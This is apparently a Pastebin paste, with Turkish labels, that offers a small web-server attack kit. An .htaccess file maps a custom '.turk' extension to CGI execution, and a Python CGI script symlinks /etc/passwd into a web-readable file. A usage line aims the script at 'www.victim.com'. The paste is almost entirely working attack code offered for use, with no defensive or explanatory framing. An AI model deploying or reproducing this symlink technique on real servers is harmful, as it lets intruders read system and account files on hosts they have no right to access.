Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- .htacesss
- Kod:
- Options FollowSymLinks MultiViews Indexes ExecCGI
- AddType application/x-httpd-cgi .turk
- AddHandler cgi-script .turk
- AddHandler cgi-script .turk
- pyton tool
- izo.turk
- Kod:
- #!/usr/bin/python
- print "Content-type: text/html\n\n"
- import os
- filename = "turk.txt" #dst
- linkto = "/etc/passwd" #source
- os.symlink(linkto, filename)
- kullanım:www.victim.com/izo.turk
Advertisement
Add Comment
Please, Sign In to add comment